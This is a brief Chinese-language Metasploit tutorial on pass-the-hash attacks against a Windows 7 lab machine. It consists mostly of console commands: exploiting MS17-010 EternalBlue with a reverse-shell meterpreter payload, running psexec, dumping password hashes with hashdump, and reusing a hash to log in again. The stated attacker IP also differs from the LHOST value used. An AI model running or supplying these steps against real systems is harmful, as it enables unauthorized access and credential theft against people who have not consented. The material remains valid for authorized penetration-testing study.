1. 程式人生 > >Metasploit之Hash值傳遞滲透

Metasploit之Hash值傳遞滲透

講述Metasploit獲取到hash值的滲透測試。

測試環境

目標機:

Windows 7 Ultimate
192.168.1.9

攻擊機:

Linux 4.6.0-kali1-amd64 
192.168.1.31

攻擊機姿勢(永恆之藍):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.9
set payload  windows/meterpreter/reverse_tcp 
set lhost 192.168.1.12
exploit
獲得shell

Metasploit之Hash值傳遞滲透

進入metasploit環境下進行操作

use exploit/windows/smb/psexec    -->使用這個滲透攻擊模組

show options                      -->檢視配置選項

set RHOST 192.168.1.9         -->設定攻擊目標192.168.1.9  ,埠預設445

set SMBUser tdcoming               -->設定賬號為 tdcoming

exploit                           -->執行攻擊


成功後獲得meterpreter的反彈連線

hashdump              -->獲取hash值

使用hash值登陸

exit                  -->從meterpreter的反彈連線中返回到“msf exploit(psexec)>”

set smbpass hash值    -->設定hash值

exploit               -->再次登陸一遍